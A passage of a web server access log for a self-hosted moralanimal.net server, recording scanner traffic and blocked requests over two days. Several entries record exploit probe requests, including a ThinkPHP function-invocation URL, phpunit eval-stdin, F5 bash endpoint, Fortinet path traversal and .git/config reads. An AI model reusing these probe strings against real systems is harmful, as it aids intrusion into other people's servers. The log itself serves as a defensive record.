Gecko/20100101 Firefox/76.0" "-" [24/Sep/2021:08:42:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [24/Sep/2021:08:42:06 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20210924164119" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [24/Sep/2021:09:22:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.59] [Length 0] [Gzip -] "-" "-" [24/Sep/2021:09:22:15 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.59] [Length 252] [Gzip -] "-" "-" [24/Sep/2021:09:22:15 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.59] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [24/Sep/2021:09:47:12 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:09:47:13 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:10:27:37 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:10:27:37 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:12:29:56 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.214.22] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Sep/2021:12:58:27 +0000] 444 - POST https 64.22.31.253 "/mgmt/tm/util/bash" [Client 209.141.59.139] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" "-" [24/Sep/2021:12:59:39 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 34.77.162.3] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [24/Sep/2021:14:27:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.62.117.51] [Length 0] [Gzip -] "-" "-" [24/Sep/2021:15:12:00 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 34.96.130.15] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [24/Sep/2021:15:30:26 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Sep/2021:15:30:27 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Sep/2021:15:30:30 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [24/Sep/2021:15:30:32 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Sep/2021:15:30:34 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Sep/2021:15:30:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Sep/2021:15:30:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Sep/2021:15:30:38 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Sep/2021:15:30:38 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Sep/2021:15:30:40 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Sep/2021:15:30:42 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Sep/2021:15:30:45 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Sep/2021:15:59:14 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:15:59:14 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:16:13:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Sep/2021:17:02:24 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Sep/2021:17:02:24 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Sep/2021:17:02:24 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Sep/2021:17:02:24 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Sep/2021:17:02:24 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Sep/2021:17:02:24 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Sep/2021:18:30:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.65.8.99] [Length 0] [Gzip -] "Mozilla/5.0" "-" [24/Sep/2021:18:41:23 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:18:41:23 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:20:05:46 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [24/Sep/2021:20:32:39 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:20:32:39 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:20:38:38 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 91.132.58.62] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [24/Sep/2021:20:46:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.9] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [24/Sep/2021:20:57:28 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:20:57:29 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:21:28:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Sep/2021:23:05:34 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.209.223] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Sep/2021:23:05:37 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.213.50] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Sep/2021:23:06:33 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.200.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Sep/2021:23:28:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 92.118.161.21] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [24/Sep/2021:23:51:30 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.203.108] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Sep/2021:00:03:51 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 92.118.160.45] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [25/Sep/2021:00:43:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Sep/2021:01:40:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Sep/2021:01:48:04 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [25/Sep/2021:02:55:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 180.149.125.175] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [25/Sep/2021:03:13:43 +0000] 444 - GET https 64.22.31.253 "/_asterisk/" [Client 77.247.108.81] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [25/Sep/2021:03:30:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.196] [Length 0] [Gzip -] "-" "-" [25/Sep/2021:03:39:16 +0000] 400 - GET http 64.22.31.253 "/admin/config.php" [Client 77.247.108.81] [Length 252] [Gzip -] "python-requests/2.26.0" "-" [25/Sep/2021:04:05:19 +0000] 444 - GET https speedtest.moralanimal.net "/.git/config" [Client 199.249.230.167] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [25/Sep/2021:04:31:58 +0000] 400 - GET https localhost "/" [Client 34.65.139.43] [Length 154] [Gzip -] "-" "-" [25/Sep/2021:04:32:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.65.139.43] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [25/Sep/2021:04:39:50 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 34.77.162.28] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [25/Sep/2021:05:10:26 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.196.211] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Sep/2021:05:24:25 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [25/Sep/2021:07:30:09 +0000] 444 - GET https 64.22.31.253 "/dns-query?dns=ZDEBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE" [Client 161.117.239.46] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [25/Sep/2021:07:30:10 +0000] 444 - GET https 64.22.31.253 "/dns-query?dns=uFMBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE" [Client 161.117.239.46] [Length 0] [Gzip -] "python-httpx/0.19.0" "-" [25/Sep/2021:07:30:11 +0000] 444 - GET https localhost "/dns-query?dns=iyIBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE" [Client 161.117.239.46] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [25/Sep/2021:07:30:12 +0000] 444 - GET https localhost "/dns-query?dns=-yEBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE" [Client 161.117.239.46] [Length 0] [Gzip -] "python-httpx/0.19.0" "-" [25/Sep/2021:08:18:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Sep/2021:08:18:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.205.198] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Sep/2021:08:32:33 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:08:32:35 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [25/Sep/2021:08:32:35 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:08:32:37 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:08:32:37 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:08:32:40 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:08:32:41 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:08:32:42 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:08:32:44 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:08:32:46 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:08:32:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:08:32:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:09:52:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Sep/2021:10:24:58 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [25/Sep/2021:12:31:51 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.199.164] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Sep/2021:13:14:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Sep/2021:14:21:23 +0000] 444 - GET https pop.moralanimal.net "/" [Client 92.118.160.37] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [25/Sep/2021:14:21:50 +0000] 400 - OPTIONS http 64.22.31.253 "/" [Client 181.214.206.111] [Length 654] [Gzip -] "Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36" "-" [25/Sep/2021:15:18:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 88.9.119.217] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Sep/2021:16:48:29 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 92.118.160.37] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [25/Sep/2021:17:02:26 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Sep/2021:17:02:26 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Sep/2021:17:02:26 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Sep/2021:17:02:26 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Sep/2021:17:02:26 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Sep/2021:17:02:26 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Sep/2021:19:21:51 +0000] 444 - GET https 64.22.31.253 "//a2billing/customer/templates/default/footer.tpl" [Client 193.107.216.175] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.42.2.el7.x86_64" "-" [25/Sep/2021:19:34:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Sep/2021:20:01:39 +0000] 444 - GET https localhost "/" [Client 8.142.93.123] [Length 0] [Gzip -] "-" "-" [25/Sep/2021:20:01:40 +0000] 444 - OPTIONS https localhost "/" [Client 8.142.93.123] [Length 0] [Gzip -] "-" "-" [25/Sep/2021:20:01:41 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 8.142.93.123] [Length 0] [Gzip -] "-" "-" [25/Sep/2021:20:01:42 +0000] 400 - - https localhost "-" [Client 8.142.93.123] [Length 154] [Gzip -] "-" "-" [25/Sep/2021:20:01:47 +0000] 400 - - https localhost "-" [Client 8.142.93.123] [Length 0] [Gzip -] "-" "-" [25/Sep/2021:20:01:48 +0000] 400 - - https localhost "-" [Client 8.142.93.123] [Length 154] [Gzip -] "-" "-" [25/Sep/2021:20:01:49 +0000] 400 - - https localhost "-" [Client 8.142.93.123] [Length 154] [Gzip -] "-" "-" [25/Sep/2021:20:01:50 +0000] 400 - - https localhost "-" [Client 8.142.93.123] [Length 154] [Gzip -] "-" "-" [25/Sep/2021:20:01:51 +0000] 400 - - https localhost "-" [Client 8.142.93.123] [Length 154] [Gzip -] "-" "-" [25/Sep/2021:20:01:52 +0000] 400 - - https localhost "-" [Client 8.142.93.123] [Length 154] [Gzip -] "-" "-" [25/Sep/2021:20:01:53 +0000] 400 - - https localhost "-" [Client 8.142.93.123] [Length 154] [Gzip -] "-" "-" [25/Sep/2021:20:01:53 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 8.142.93.123] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [25/Sep/2021:20:01:53 +0000] 444 - GET https 64.22.31.253 "/text4041632600063" [Client 8.142.93.123] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [25/Sep/2021:20:01:53 +0000] 444 - GET https localhost "/" [Client 8.142.93.123] [Length 0] [Gzip -] "-" "-" [25/Sep/2021:20:01:54 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 8.142.93.123] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [25/Sep/2021:20:01:54 +0000] 400 - GET http localhost "/" [Client 8.142.93.123] [Length 252] [Gzip -] "-" "-" [25/Sep/2021:20:01:54 +0000] 400 - GET http 64.22.31.253 "/text4041632600063" [Client 8.142.93.123] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [25/Sep/2021:20:01:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 8.142.93.123] [Length 0] [Gzip -] "-" "-" [25/Sep/2021:20:01:55 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 8.142.93.123] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [25/Sep/2021:20:01:55 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 8.142.93.123] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [25/Sep/2021:20:01:55 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 8.142.93.123] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [25/Sep/2021:20:01:55 +0000] 400 - GET http 64.22.31.253 "/" [Client 8.142.93.123] [Length 252] [Gzip -] "-" "-" [25/Sep/2021:20:01:55 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 8.142.93.123] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [25/Sep/2021:20:02:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 8.142.93.123] [Length 0] [Gzip -] "-" "-" [25/Sep/2021:20:02:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 8.142.93.123] [Length 0] [Gzip -] "curl/7.75.0" "-" [25/Sep/2021:21:25:58 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [25/Sep/2021:22:34:10 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Sep/2021:22:34:11 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 